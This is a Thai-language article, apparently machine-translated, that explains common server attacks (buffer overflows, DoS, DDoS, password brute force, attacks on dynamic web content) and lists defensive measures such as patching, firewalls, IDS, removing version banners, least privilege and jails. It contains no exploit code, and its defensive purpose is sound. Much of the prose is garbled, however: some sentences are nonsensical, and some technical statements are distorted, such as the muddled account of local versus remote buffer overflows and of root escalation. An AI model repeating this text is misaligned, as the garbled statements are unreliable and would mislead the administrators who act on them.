เพื่อทำความเข้าใจส่วนของฉัน ลองนึกภาพว่ามีสคริปต์สมมติที่โจมตี Apache จากระยะไกลบนพอร์ต 80 และจากผลของการโจมตี Apache จะปิดตัวลง และคุณจะถูกทิ้งไว้โดยไม่มีไซต์ของคุณ เนื่องจากไม่มีใครแจกหน้าเว็บ เซิร์ฟเวอร์อีเมล sendmail ของคุณถูกส่ง 1,000 อักขระเป็นพารามิเตอร์ไปยัง VRFY แทนที่จะเป็นชื่อผู้ใช้แบบสั้น sendmail ไม่ได้คาดหวังว่าสิ่งนี้จะเกิดขึ้นและปิดลง ทำให้คุณไม่มีเมล ความหมายทั่วไปของการโจมตีของคลาสแบบมีเงื่อนไขนี้คือช่องโหว่ของแอปพลิเคชั่นบางตัวถูกโจมตี และมีสามวิธี -

• เส้นทาง1) แอปพลิเคชันจะขัดข้องและบริการจะไม่สามารถใช้ได้ สถานการณ์ DoS;
• เส้นทาง 2) แอปพลิเคชันจะเริ่มจับทรัพยากรและเมื่อหมดลงแล้วจะทำ DoS
• เส้นทาง3) แอปพลิเคชันจะได้รับเชลล์โค้ดและโค้ดของผู้โจมตีจะถูกดำเนินการ

สิ่งเหล่านี้ล้วนเป็นการโจมตีบริการ (รายการที่ 1) และได้รับการปฏิบัติเพียงวิธีเดียวเท่านั้น: ผู้ดูแลระบบจะเรียนรู้จากผู้พัฒนาเกี่ยวกับช่องโหว่และอัปเดตโปรแกรมนี้ในทันที

การโจมตีในจุดที่ 2 คือเมื่อบริการแบบไดนามิกที่ใช้งานในภาษาการเขียนโปรแกรมบางภาษาอนุญาตให้รับพารามิเตอร์และดำเนินการได้โดยไม่ต้องตรวจสอบ ตัวอย่างเช่น การใช้เบราว์เซอร์ ผู้โจมตี การรวบรวมข้อมูลผ่านไซต์ Apache ค้นหาช่องโหว่ในไซต์และใช้ประโยชน์จากช่องโหว่ ได้สิ่งที่ต้องการ เขียนใน Tcl บอทสำหรับกลั่นกรองช่องเซิร์ฟเวอร์ IRC ได้รับคำขอจากผู้ใช้ (จำนวนตลกใหม่ วันที่แสดงสภาพอากาศ) และแฮ็กเกอร์ สร้างงานของรหัสโปรแกรมบอท (วิศวกรรมย้อนกลับ) ) สร้างคำขอที่ผู้เขียนบอทไม่ได้พิจารณา

ถามว่าเป็นยังไงบ้าง? คุณต้องมีบทความนี้อย่างแน่นอน ไม่ทางใดก็ทางหนึ่งด้านล่างทุกอย่างจะถูกทาสี

โจมตีบริการที่มีช่องโหว่และตัวเซิร์ฟเวอร์เอง

ในส่วนนี้ ฉันได้รวมการโจมตีทั้งหมดที่มีผลกระทบต่อระบบและบริการ บ่อยครั้งที่การโจมตีดังกล่าวเกิดขึ้นได้จากข้อผิดพลาดในการใช้งานโปรแกรม เช่น บัฟเฟอร์ล้น (บัฟเฟอร์ล้น) กล่าวโดยย่อ ดูเหมือนว่านี้ สมมติว่าในเซิร์ฟเวอร์ ftp ที่เขียนได้ไม่ดี มีอาร์เรย์ (บัฟเฟอร์) สำหรับชื่อผู้ใช้สำหรับจำนวนอักขระที่กำหนด (เช่น 10) และเซิร์ฟเวอร์ ftp ดังกล่าวได้รับอักขระ 100 ตัวจากการป่วย - ถ้าสถานการณ์ดังกล่าวไม่อยู่ในรหัสเซิร์ฟเวอร์ ftp ที่ตรวจสอบ บัฟเฟอร์ล้นจะเกิดขึ้น

ดังนั้นบัฟเฟอร์ล้นในเครื่องมีประโยชน์สำหรับแฮกเกอร์อย่างไร เป็นไปได้ที่จะเขียนทับที่อยู่ผู้ส่งด้วยรหัสที่เป็นอันตราย จากระยะไกล วิธีนี้ทำให้คุณสามารถรันโค้ดโดยอำเภอใจบนระบบเป้าหมายได้ภายในเครื่อง หากโปรแกรมทำงานเป็นรูท ซึ่งจะทำให้คุณได้รับสิทธิ์ของผู้ดูแลระบบ รหัสที่ทำให้เกิดบัฟเฟอร์ล้นและดำเนินการกับแฮ็กเกอร์เรียกว่า เชลล์ รหัส การเขียน shellcode ไม่ใช่เรื่องง่าย และต้องใช้ความรู้ภาษาแอสเซมบลีจากแฮกเกอร์ซึ่งบ่งบอกถึงความเป็นมืออาชีพในด้านนี้

การป้องกันการโจมตีบริการที่มีช่องโหว่และตัวเซิร์ฟเวอร์เอง

• อัปเดต. จำเป็นต้องเรียนรู้วิธีอัปเดตทั้งระบบและเพื่อให้สามารถ
  "สร้างโลกและเคอร์เนล" สำหรับ *nix อัปเดตผ่านระบบแพ็คเกจ Linux และสามารถคลิกปุ่มอัปเดตใน Windows Update สำหรับ MS Windows ที่ได้รับอนุญาต ผู้ดูแลระบบ FreeBSD ต้องสามารถติดตั้งซอฟต์แวร์โดยใช้พอร์ตได้ วิธีนี้คุณจะแล่นเรือไปกับนักพัฒนา ไม่ใช่ต่อต้านพวกเขา

  ผู้ดูแลระบบ MS Windows จำเป็นต้องทำความคุ้นเคยและใช้รูปแบบการแจกจ่าย MSI บ่อยขึ้น ซึ่ง Microsoft แนะนำเป็นอย่างยิ่งและสนับสนุนการอัปเดตแพ็คเกจเก่าด้วยแพ็คเกจใหม่ สิ่งที่คุณทำบนเซิร์ฟเวอร์ของคุณ ให้ถามตัวเองว่ามีเวอร์ชันใหม่ของโปรแกรมนี้หรือไม่ การอัปเดตนั้นง่ายเพียงใด คุณต้องสร้างโซลูชันที่คุณควบคุมได้อย่างเต็มที่ ใช่ มีโครงการที่มีการพัฒนาหรือแพตช์ของตัวเอง แต่ถ้าการพัฒนาของคุณต้องการการหยุดแอปพลิเคชันที่คุณต้องการในเวอร์ชันหนึ่ง และคุณไม่สามารถนำแพตช์ของคุณไปใช้กับระบบใหม่ได้ - วิธีแก้ปัญหาดังกล่าวไม่คุ้มค่า!

  ฉันจะพูดนอกเรื่องโคลงสั้น ๆ ที่นี่และบอกคุณว่าฉันต้องทำลายตัวเองอย่างไร หลังจากอ่านบทความบนอินเทอร์เน็ตที่มักจะเริ่มต้นเช่นนี้ "ดาวน์โหลดแหล่งที่มาและนำไปทำการติดตั้ง" แล้วยังไงต่อ? คุณจะติดตั้งเวอร์ชันใหม่ได้อย่างไร? เก็บเวอร์ชันเก่าไว้เพื่อให้คุณสามารถ (ยกเลิก | ถอนการติดตั้ง) ติดตั้งในนั้นได้หรือไม่ และในการติดตั้งใหม่อีกครั้ง? เพื่อนของฉัน Dmitry Dubrovin ถามคำถามเหล่านี้เมื่อเราเริ่มเรียนรู้ FreeBSD ฉันเริ่มเข้าใจว่าเขาพูดถูก และอย่างน้อยสำหรับ Free เส้นทางนี้ไม่เหมาะ และไม่ทำตามเส้นทางของนักพัฒนา FreeBSD ฉันจึงทำให้สิ่งต่างๆ ยากขึ้นสำหรับตัวเองเท่านั้น

  ตอนนี้เมื่อเข้าใจ FreeBSD แล้ว เมื่อคำสั่งสองสามคำสั่งดาวน์โหลดแหล่งข้อมูลใหม่สำหรับเคอร์เนล Free และระบบทั้งหมด จากนั้นคำสั่งสองสามคำสั่งจะสร้างโลกใหม่และเคอร์เนล จากนั้นอัปเดตพอร์ตและแอปพลิเคชันในระบบ คุณจะเริ่มเข้าใจ พลังของระบบ * ระวัง เป็นการยากที่จะถ่ายทอดความภาคภูมิใจที่คุณรู้สึกเมื่อคุณอัพเกรดเซิร์ฟเวอร์ด้วย FreeBSD จากสาขาเก่าเป็นสาขาปัจจุบัน สร้างโลกของระบบใหม่ เมื่อระบบรวบรวมตัวเองจากแหล่งใหม่ (ดูเหมือนว่า Munchausen ดึงตัวเองด้วยผม) และทุกอย่าง ที่ทำงานก่อนการอัปเกรดยังใช้งานได้ "ไม่มีไฟล์"

  ตามที่คุณเข้าใจแล้ว คุณต้องสมัครรับจดหมายความปลอดภัยจากผู้พัฒนาซอฟต์แวร์ที่สนับสนุนธุรกิจของคุณและได้รับการอัปเดตเป็นระยะ การต่ออายุของทุกอย่างและทุกอย่างจะต้องสมบูรณ์และติดบนราง

• การปรับความปลอดภัย. ระบบปฏิบัติการเซิร์ฟเวอร์ส่วนใหญ่ไม่ได้กำหนดค่ามาเพียงพอสำหรับการทำงานในสภาพแวดล้อม "สารเคมี" ที่รุนแรงของอินเทอร์เน็ตโดยค่าเริ่มต้น เพื่อให้แฮกเกอร์ "ไม่โกง" บนเซิร์ฟเวอร์ของคุณ คุณต้องทำการปรับความปลอดภัย กล่าวคือ อ่านคำแนะนำของผู้ผลิตระบบปฏิบัติการเกี่ยวกับความปลอดภัย ผู้ดูแลระบบ *nix สามารถเรียกการรักษาความปลอดภัยของมนุษย์ และหลังจากอ่านคำแนะนำของนักพัฒนาแล้ว จะทำให้เทพนิยายเป็นจริง แต่ไม่ว่าจะเป็นระบบปฏิบัติการใด คุณต้องทดสอบการทำงานของเซิร์ฟเวอร์และบริการอย่างระมัดระวังหลังจากปรับความปลอดภัยแล้ว
• ไฟร์วอลล์. ไฟร์วอลล์ที่กำหนดค่าไว้ซึ่งคุณตรวจสอบเป็นการส่วนตัวโดยใช้เครื่องสแกนพอร์ต nmap และเครื่องสแกนช่องโหว่ หากมีผลลัพธ์จากโปรแกรมเหล่านี้ คุณทุกคนเข้าใจหรือไม่ว่ามีความเสี่ยงสูง เมื่อตั้งค่าไฟร์วอลล์ จำไว้ว่ามีวิธีเลี่ยงกฎของมัน ตัวอย่างเช่น หากมีเครือข่ายท้องถิ่นที่ป้องกันโดยไฟร์วอลล์ โดยการตั้งค่าแฟล็กการห้ามการกระจายตัวของแพ็กเก็ต เป็นไปได้ในบางสถานการณ์เพื่อไปถึงปลายทางในเครือข่ายท้องถิ่น หรือข้อผิดพลาดทั่วไปของผู้ดูแลระบบ ไว้วางใจมากเกินไปในแพ็คเก็ตขาออกของเซิร์ฟเวอร์ของเขาเอง

  ลองนึกภาพสถานการณ์จริง รหัสศัตรูกำลังพยายามเชื่อมต่อกับโฮสต์ของแฮ็กเกอร์ และคุณมีกฎในไฟร์วอลล์ "ทุกอย่างได้รับอนุญาตจากฉันไปยังอินเทอร์เน็ต" เมื่อเขียนกฎไฟร์วอลล์ คุณต้องเข้าใจภาพรวมทั้งหมดของการสื่อสารเครือข่ายของบริการของคุณระหว่างพวกเขากับไคลเอ็นต์ระยะไกล

• ระบบตรวจจับการบุกรุก. ไฟร์วอลล์สามารถจินตนาการได้ว่าเป็นกำแพงหินใกล้กับปราสาทของอัศวิน สร้างครั้งเดียวและนั่งข้างใน - แห้งและสบาย แต่ถ้ามีใครทดสอบความแข็งแกร่งของกำแพงจากปืนใหญ่อยู่แล้วล่ะ? บางทีคุณอาจจำเป็นต้องมองออกไปนอกปราสาทแล้วกองทับใครซักคน? หากต้องการทราบว่าเกิดอะไรขึ้นหลังกำแพงปราสาท หรือภายนอกปราสาท คุณต้องมีระบบตรวจจับการบุกรุก (IDS) บนเซิร์ฟเวอร์ หากคุณมีระบบดังกล่าวตามแพ็คเกจที่คุณชอบ ถ้ามีคนเริ่มยิงจากปืน nmap คุณจะรับรู้ และผู้โจมตีก็จะรับรู้ถึง "สิ่งที่คุณรู้" ด้วย
• การวิเคราะห์สถานการณ์ที่ไม่ได้มาตรฐาน. ในบันทึกจำนวนมากในระบบ คำจารึก "ข้อผิดพลาด: ไม่เปิดไฟล์ /etc/passwd" หรือ "ปฏิเสธการเข้าถึง" มักจะกะพริบ นี่เป็นเสียงกริ่งเล็กๆ ที่ส่งเสียงเกี่ยวกับแอปพลิเคชันที่กำหนดค่าไม่ถูกต้องซึ่งไม่สามารถอ่านบางอย่างได้จากที่ไหนสักแห่ง หรืออาจไม่ใช่กระดิ่ง แต่เป็นเสียงเตือนที่ส่งเสียงเตือนเกี่ยวกับแฮ็กเกอร์ที่อยู่ครึ่งทาง

  ยังไงแอดมินก็ควรทราบเรื่องดังกล่าว เพื่ออำนวยความสะดวกในการทำงานของผู้ดูแลระบบ จึงได้มีการสร้างโปรแกรมที่จะวิเคราะห์บันทึกสำหรับลักษณะของวลีที่น่าสนใจและส่งรายงานไปยังผู้ดูแลระบบทางไปรษณีย์ อย่าดูหมิ่นโอกาสดังกล่าว โปรแกรมดังกล่าวเปรียบได้กับยามที่ตรวจสอบเส้นทางที่เชื่อถือได้ แต่ทุกคนประพฤติตามที่กำหนดหรือไม่?

• ลบเวอร์ชันซอฟต์แวร์. ลบแบนเนอร์ออกจากบริการของคุณ ไม่ ไม่ใช่แบนเนอร์ที่คุณแสดงบนไซต์ของคุณ แต่เป็นบรรทัดที่โปรแกรมของคุณให้ไว้เป็นคำทักทายเมื่อเชื่อมต่อหรือแสดงข้อผิดพลาด ไม่จำเป็นต้องโดดเด่นกว่าเวอร์ชันของโปรแกรมของคุณ แฮกเกอร์ค้นหาทางอินเทอร์เน็ตสำหรับโปรแกรมที่พร้อมใช้งานซึ่งใช้ประโยชน์จากช่องโหว่นี้หรือช่องโหว่นั้น (การหาประโยชน์ - การใช้ประโยชน์) ตามเวอร์ชัน

  ไม่มีวิธีแก้ปัญหาเดียวที่นี่ ตัวอย่างเช่น หากคุณติดตั้งโปรแกรมบางโปรแกรมจากพอร์ต อย่าเขียนว่า make install clean ดังนั้นหากไม่มีคุณ ทุกอย่างจะถูกดาวน์โหลด รวบรวม และติดตั้ง ดีกว่าทำการดึง; ทำสารสกัด; จากนั้นไปที่ไดเร็กทอรีย่อยของไฟล์และคุณสามารถแก้ไขเวอร์ชันของโปรแกรมในแหล่งที่มาหรือส่งต่อเป็นไดเร็กทอรีอื่นจากนั้นทำการติดตั้งแบบคลีนเท่านั้น

  Apache เป็นข้อมูลที่ไม่ธรรมดาและยังคงโดดเด่นในเวอร์ชันระบบ PHP, Perl, OpenSSL ความอับอายถูกปิดใช้งานโดยการระบุคำสั่งใน httpd.conf ServerSignature Off ServerTokens Prod บนอินเทอร์เน็ต คุณสามารถค้นหาความช่วยเหลือเกี่ยวกับการเปลี่ยนแบนเนอร์ด้วยโปรแกรมใดก็ได้ เป้าหมายเหมือนกัน - เพื่อกีดกันผู้โจมตีข้อมูลที่มีค่า ดูรายชื่อบริการที่มีจากอินเทอร์เน็ต ให้ถามตัวเองว่าข้อมูลนั้นให้ข้อมูลเกี่ยวกับตัวเองและข้อมูลที่เก็บมากเกินไปหรือไม่

  ตัวอย่างเช่น การเชื่อมโยงเซิร์ฟเวอร์ DNS สามารถอนุญาต "การถ่ายโอนโซน" และคอมพิวเตอร์ของคุณที่มี IP และชื่อโดเมนจะพร้อมใช้งานสำหรับทุกคน ซึ่งไม่ดี ตรวจสอบเซิร์ฟเวอร์ของคุณด้วยเครื่องสแกนต่างๆ และอ่านผลลัพธ์อย่างละเอียด เมื่อเปลี่ยนแบนเนอร์โปรแกรม ฉันไม่แนะนำให้คุณใส่ข้อความแบบสุ่ม แต่เตือนเกี่ยวกับความรับผิดชอบและการกระทำนั้นจะถูกบันทึกไว้ เนื่องจากมีเหตุการณ์เมื่อแฮ็กเกอร์ถูกปล่อยตัวในห้องพิจารณาคดีเพราะบนเซิร์ฟเวอร์ FTP ที่ถูกแฮ็กมีข้อความว่า "ยินดีต้อนรับ!

• กฎข้อกำหนดขั้นต่ำ. ลดบริการที่มีอยู่สำหรับอินเทอร์เน็ตให้น้อยที่สุด ปิดใช้งานสิ่งที่คุณไม่ต้องการ เนื่องจากคุณไม่สามารถแฮ็กสิ่งที่ปิดใช้งานได้ ข้อผิดพลาดทั่วไป เช่น เมื่อเซิร์ฟเวอร์ MySQL ที่จับคู่กับ Apache บนเครื่องเดียวกันได้รับการกำหนดค่าให้สามารถเข้าถึงได้จากระยะไกลบนพอร์ตเริ่มต้น 3306 เพราะอะไร ให้คำสั่ง netstat -na | grep LISTEN และให้คำตอบกับตัวเอง: คุณรู้หรือไม่ว่าโปรแกรมใดใช้อินเทอร์เฟซใดและพอร์ตใด คุณอยู่ในการควบคุม? ถ้าอย่างนั้น
• รหัสผ่านที่รัดกุมและแตกต่างกันมากมาย. บ่อยครั้งในวิดีโอเกี่ยวกับการแฮ็กหรือเรื่องราวของแฮ็กเกอร์เกี่ยวกับการแฮ็ก วลี "เป็นการดีที่ผู้ดูแลระบบมีรหัสผ่านเดียวสำหรับแผงผู้ดูแลระบบ ซึ่งขึ้นไปยัง ssh และ ftp ด้วย" ฉันหวังว่านี่ไม่เกี่ยวกับคุณ ดังนั้นกฎ: รหัสผ่านสำหรับบริการต่างๆ จะต้องแตกต่างกันและมีความยาวอย่างน้อย 16 อักขระ ให้พวกเขาเขียนลงบนกระดาษถ้าคุณกลัวที่จะลืม (ในที่นี้ผู้เชี่ยวชาญด้านความปลอดภัยฆ่าฉัน) แต่นี่ดีกว่ารหัสผ่านของคุณที่ถูกถอดรหัสโดยผู้โจมตีจากระยะไกลในเวลาไม่กี่นาทีเนื่องจากความยาวเพียงเล็กน้อยของ รหัสผ่านและความคล้ายคลึงกับคำในพจนานุกรมทำให้เป็นไปได้

  รหัสผ่านที่แตกต่างกันสำหรับบริการต่างๆ จะทำได้ง่ายหากบริการต่างๆ อนุญาตไม่ใช่ในฐานะผู้ใช้ระบบในฐานข้อมูล /etc/passwd แต่เป็นรหัสผ่านเสมือนในฐานข้อมูลระนาบหรือฐานข้อมูล DBMS ของตนเอง อย่าเก็บรหัสผ่านบนเซิร์ฟเวอร์ในไฟล์ password.txt สำหรับทรัพยากรทั้งหมดที่คุณในฐานะผู้ดูแลระบบมีสิทธิ์เข้าถึง

• ข้อจำกัด. บริการทั้งหมดของคุณบนเซิร์ฟเวอร์ต้องเรียกใช้จากบัญชีจำกัด (บัญชี) ที่แตกต่างกัน และต้องไม่เรียกใช้จากบัญชีรูท เชื่อฉันเถอะว่าหากพวกเขาได้รับการยกระดับสิทธิ์จากบัญชีที่จำกัดไปยังสถานะรูท (uid=0, gid=0) คุณจะรอดพ้นจากช่องโหว่ที่รู้จักในระบบที่อัปเดตของคุณ

  อย่างไรก็ตาม ผู้ดูแลระบบหลายคนลืมสิ่งนี้ไป เช่น ทำไมบัญชีสำหรับใช้งาน Apache และ MySQL จึงควรมีสิทธิ์เข้าถึงเชลล์! ท้ายที่สุดสิ่งนี้สามารถปิดใช้งานได้และแทนที่จะระบุเชลล์ / bin / false จริงๆ แล้ว ตรวจสอบบัญชีของคุณสำหรับโปรแกรมบนเซิร์ฟเวอร์การรายงานของคุณและบอกฉันว่าฉันคิดผิดหรือเปล่า ในฐานข้อมูล SQL ของคุณ จำกัดบัญชีให้มีสิทธิ์ขั้นต่ำที่จำเป็น อย่าให้สิทธิ์ FILE เมื่อเรียกเฉพาะ SELECT

• ทุกคนเข้าคุก!เรียนรู้วิธีทำงานกับแซนด์บ็อกซ์ (แซนด์บ็อกซ์) หรือเรือนจำ (คุก) และเรียกใช้แอปพลิเคชันในห้องแยกเหล่านี้ ซึ่งจะทำให้แฮ็คเซิร์ฟเวอร์ทั้งหมดได้ยาก หากคุณใช้เวอร์ชวลไลเซชั่น คุณสามารถกระจายบริการต่างๆ ข้ามระบบปฏิบัติการของแขกได้
• การป้องกันชั้นเป็นไปได้ที่จะห้ามบางสิ่งบางอย่างในที่ต่างๆ ได้หลายวิธี - ทำมัน ไม่เคยคิด - ฉันห้ามที่นี่มีเพื่อห้ามฟุ่มเฟือย

เรียนรู้เพิ่มเติมเกี่ยวกับการโจมตีบริการที่มีช่องโหว่และตัวเซิร์ฟเวอร์เอง

• การโจมตี DoS (การปฏิเสธการให้บริการ) - การโจมตีที่มีเป้าหมายเพื่ออุดตันทรัพยากรเซิร์ฟเวอร์ที่จำกัด (ช่องสัญญาณอินเทอร์เน็ต, RAM, โปรเซสเซอร์ ฯลฯ ) เพื่อให้เซิร์ฟเวอร์ไม่สามารถให้บริการผู้ใช้ที่ถูกกฎหมายได้ ลองนึกภาพว่ามีผู้บุกรุกโทรหาคุณที่บ้านและเงียบทางโทรศัพท์ และเหตุการณ์นี้ดำเนินไปตลอดทั้งคืน คุณเหนื่อยกับเรื่องทั้งหมดนี้และปิดโทรศัพท์ และในตอนเช้าคุณพบว่าคุณไม่ได้รับสายสำคัญจากเจ้านายของคุณ นี่คือการเปรียบเทียบในชีวิตจริงสำหรับการโจมตี DoS

  ในชีวิตจริง DoS มักจะมีลักษณะเช่นนี้ เนื่องจากมีข้อบกพร่องในโปรแกรม การใช้งานโปรเซสเซอร์จึงเพิ่มขึ้นและคงอยู่ที่ 100% เป็นเวลานาน และผู้โจมตีจะใช้ประโยชน์จากช่องโหว่นี้ในโปรแกรมเป็นระยะ แอปพลิเคชันที่เขียนไม่ดีอาจมี RAM ไม่เพียงพอ หรือ "เมลบอมบ์" ในรูปแบบของไฟล์บีบอัดอย่างหนักในไฟล์เก็บถาวรที่มีอักขระหลายตัว [ช่องว่าง] ซึ่งจะถูกแยกออกเพื่อตรวจสอบโดยโปรแกรมป้องกันไวรัสและไฟล์ขนาดใหญ่ที่คลายการบีบอัดจะล้นพาร์ติชั่นฮาร์ดดิสก์บนเซิร์ฟเวอร์และ / และ ทำให้เซิร์ฟเวอร์รีบูต

  การป้องกันการโจมตี DoS:

  • การอัปเดตโปรแกรมที่กำลังถูกจัดการสำหรับการโจมตี DoS
  • กำหนดโควต้าทรัพยากรสำหรับบัญชีที่โปรแกรมนี้กำลังทำงานอยู่ *ระบบ nix ให้คุณปรับเปอร์เซ็นต์การใช้งาน CPU, RAM, จำนวนกระบวนการที่เกิด, ไฟล์ที่เปิด ฯลฯ ฯลฯ
  • ตั้งค่าการเข้าสู่ระบบในโปรแกรมและพยายามค้นหาผู้โจมตีเชิดหุ่นและบล็อกเขาในไฟร์วอลล์
  • ตั้งค่าโปรแกรมตามคำแนะนำของนักพัฒนากูรูตามบทความบนอินเทอร์เน็ตหากคุณพบว่าตัวเองอยู่ในสถานการณ์เช่นนี้
• DDoS (DoS เดียวกัน แต่คุณถูกโจมตีจากคอมพิวเตอร์ซอมบี้หลายเครื่อง นำโดย
  ผู้โจมตี) DDoS เป็นการทำลายล้างและพวกมันจะถูกใช้งานโดยคนป่าเถื่อนที่มีฝูงเครื่องจักรซอมบี้ และจะเรียกร้องเงินเพื่อหยุดการโจมตีหรือสร้างความเสียหายให้กับธุรกิจของคุณ เพื่อให้ผู้ใช้เข้าถึงคู่แข่งโดยไม่ต้องไปถึงเซิร์ฟเวอร์ของคุณ การโจมตี DDoS ไม่ได้ถูกใช้โดยแฮกเกอร์ที่มีเป้าหมายในการแฮ็กเซิร์ฟเวอร์ของคุณอย่างชาญฉลาด ใช่ ใช่ เซิร์ฟเวอร์ของคุณเป็น "ความลึกลับ" ที่พวกเขาต้องการ "แก้ไข"

  จะป้องกันตัวเองจาก DDoS ได้อย่างไร? หากคุณพึ่งพาจุดแข็งและวิธีของคุณเอง ด้วยการทำงานอัตโนมัติของสคริปต์ คุณจะสามารถค้นหาที่อยู่ IP จากบันทึกต่างๆ และป้อนลงในกฎการห้ามไฟร์วอลล์ ตัวอย่างเช่น ผู้เขียนบทความ "Is there life under DDoS?" ในนิตยสาร Hacker หรือไม่ บล็อกเครือข่ายผู้โจมตีในไฟร์วอลล์ ความเสียหาย DDoS จะลดลงหากคุณอ่านบทความเกี่ยวกับการกำหนดค่าโปรแกรมและปฏิบัติตามคำแนะนำเหล่านี้ บทความมากมาย เกี่ยวกับวิธีการกำหนดค่าเพื่อลดความเสียหาย DDoS

  การป้องกันการโจมตี DDoS:

  • หาก DDoS ถูกส่งไปยังแอปพลิเคชัน ให้พยายามค้นหาความแตกต่างระหว่างผู้โจมตีและผู้ใช้ที่ถูกต้องในบันทึก และโดยการป้อนสคริปต์อัตโนมัติ ให้ป้อนลงในกฎไฟร์วอลล์เพื่อปฏิเสธ
  • หาก DDoS พุ่งไปที่ระบบ (เช่น การโจมตีผ่านโปรโตคอล ICMP) โดยอัตโนมัติด้วยสคริปต์ ให้เพิ่มลงในกฎไฟร์วอลล์เพื่อปฏิเสธ
  • กำหนดโควต้าทรัพยากรสำหรับบัญชีที่โปรแกรมนี้กำลังทำงานอยู่ * ระบบ nix อนุญาตให้คุณกำหนดค่าเปอร์เซ็นต์ของการใช้งาน CPU, RAM, จำนวนกระบวนการที่เกิด, ไฟล์ที่เปิด ฯลฯ
  • ตั้งค่าโปรแกรมตามคำแนะนำของผู้พัฒนา กูรู ตามบทความในอินเตอร์เน็ต หากคุณพบว่าตัวเองอยู่ในสถานการณ์เช่นนี้
  • ติดต่อผู้ให้บริการอัปสตรีมของคุณเพื่อช่วยเหลือในทุกวิถีทางที่ทำได้ เขียนเรื่องร้องเรียนถึง [ป้องกันอีเมล] host_of_networks_from_attack.domain. สิ่งนี้จะช่วยในการทำลายเครือข่ายของผู้โจมตีบางส่วน ปล่อยให้เขาได้รับความเสียหาย ทำให้เขาต้องเสียเงิน สัมผัสความพอใจทางศีลธรรม
  • ลองใช้ mod_security สำหรับ Apache ซึ่งเป็นเครื่องมือที่ยอดเยี่ยมที่จะช่วยคุณในบางสถานการณ์
• การโจมตีด้วยรหัสผ่าน Bruteforce หลุมในโปรแกรมไม่ได้ถูกตำหนิ พวกเขาเพียงแค่เลือกคู่ของการเข้าสู่ระบบ / รหัสผ่านอย่างคร่าวๆ ผู้ที่ออกจากเซิร์ฟเวอร์ด้วยการกำหนดค่า ssh แต่ลืมจำกัดการเข้าถึงผ่าน ssh จาก IP ที่แน่นอนและการเข้าสู่ระบบบางอย่าง (คำสั่งใน ssh_config AllowUser) ต้องเคยเห็นความพยายามในการบังคับรหัสผ่าน mash ในบันทึก: mash_password

  การป้องกันด้วยรหัสผ่าน Bruteforce:

  • จำกัดจำนวนครั้งในการเข้าสู่ระบบ/รหัสผ่านที่ไม่สำเร็จ
  • หากแอปพลิเคชันอนุญาต ให้ตั้งค่าเวลาที่เพิ่มขึ้นก่อนที่จะพยายามเข้าสู่ระบบ / รหัสผ่านใหม่
  • หากคนวงแคบควรทำงานกับแอปพลิเคชัน ให้สร้างกฎดังกล่าวและจำกัดไว้ที่

โจมตีผ่านเนื้อหาแบบไดนามิกของบริการ

การโจมตีประเภทนี้มักเกิดขึ้นกับ Apache + (PHP | PERL) + (MySQL | PostgreSQL) สำหรับโลก *nix และ IIS + ASP + Microsoft SQL Server สำหรับโลก MS Windows โดยใช้เบราว์เซอร์ทั่วไป แต่นี่เป็นเพียง เป็นกรณีพิเศษซึ่งใช้บ่อยขึ้นเนื่องจากความนิยมของเว็บ ในชุดรวมนี้ ภาษาการเขียนโปรแกรม ได้แก่ ASP, PHP, Perl, SQL ดังนั้นแฮกเกอร์จึงมักใช้เพื่อรวบรวมการออกแบบที่ทำลายล้าง

แต่สิ่งสำคัญที่สุดที่ต้องเข้าใจก็คือเอ็นดังกล่าว บริการ + เนื้อหาแบบไดนามิกที่ด้านบนของพวกเขามีภาษาโปรแกรมมากมายและทั้งหมดนั้นอยู่ภายใต้มือของแฮกเกอร์ ตัวอย่างเช่น นี่คือรายการที่ไม่สมบูรณ์:

• เว็บเซิร์ฟเวอร์ + สคริปต์ CGI
• ลิงค์โบราณที่ไม่ได้ใช้งานอีกต่อไป - สคริปต์ Apache + PHF (คือ PHF)
• IIS + ColdFusion Application Server
• กลไก SSI (รวมฝั่งเซิร์ฟเวอร์)

ต่อไป เราจะพูดถึงการแฮ็กเว็บเป็นส่วนใหญ่ แต่อย่าลืมว่าทุกสิ่งที่อธิบายไว้ด้านล่างนี้เป็นความจริงสำหรับบริการอื่นๆ + ชุดเนื้อหาแบบไดนามิก คำพูดต่างกัน แต่สาระสำคัญเหมือนกัน วันนี้แฮกเกอร์โจมตีเว็บด้วยเบราว์เซอร์และพรุ่งนี้ด้วยไคลเอนต์ R กับบริการ Z เว็บเซิร์ฟเวอร์ซึ่งเชื่อมต่อกับฐานข้อมูลและภาษาการเขียนโปรแกรมจำนวนมากได้กลายเป็นแพลตฟอร์มสำหรับการโจมตีประเภทนี้

ความหมายของการโจมตีประเภทนี้คือการพยายามตรวจสอบไซต์โดยใช้เบราว์เซอร์เพื่อค้นหาข้อผิดพลาดในสคริปต์ที่ให้บริการเนื้อหาแบบไดนามิก (เนื้อหา) ของไซต์

ดังนั้นข้อสรุป - การแฮ็คไซต์ผ่านการโจมตีทางเว็บ ซึ่งมีเพียงหน้า html แบบสแตติกที่อ้างอิงถึงกันเท่านั้นจึงเป็นไปไม่ได้ การโจมตีผ่านเว็บไซต์ของคุณเกิดขึ้นเมื่อผู้คนต้องการการโต้ตอบมากขึ้นและเพิ่มผ่านภาษาโปรแกรมและฐานข้อมูล

แฮกเกอร์ที่ท่องเว็บไซต์ให้ความสนใจเป็นพิเศษกับสคริปต์ที่ส่งผ่านพารามิเตอร์ใดๆ แต่ถ้าผู้เขียนสคริปต์ไม่ตรวจสอบว่าค่าพารามิเตอร์ใดที่ส่งผ่านอย่างแน่นอน

วิธีแก้ปัญหาทั่วไปสำหรับผู้ดูแลระบบจากการโจมตีเนื้อหาแบบไดนามิกของบริการ (เว็บไซต์เป็นกรณีพิเศษ)

• อัปเดต. เราได้พูดคุยเกี่ยวกับเรื่องนี้แล้ว แต่ถ้าคุณใช้การพัฒนาของบุคคลที่สาม (เอ็นจิ้นของฟอรัม แกลเลอรี่ แชท ฯลฯ) คุณจะได้รับรายงานเกี่ยวกับช่องโหว่และช่องโหว่ ความคิดเห็นของแฮ็กเกอร์คือหากพอร์ทัลทำงานด้านการเงินและการหมุนเวียนของพวกเขา ก็ไม่เป็นที่พึงปรารถนาสำหรับพอร์ทัลดังกล่าวที่จะมีการพัฒนาของผู้อื่น ยกเว้นสำหรับพวกเขาเอง แน่นอนว่าเป็นที่เข้าใจกันว่าการพัฒนาเอ็นจิ้นของตนเองสำหรับไซต์นั้นเขียนขึ้นโดยผู้เขียนโค้ดที่รู้วิธีตั้งโปรแกรมอย่างปลอดภัยและมีความเข้าใจถึงภัยคุกคามบนอินเทอร์เน็ต
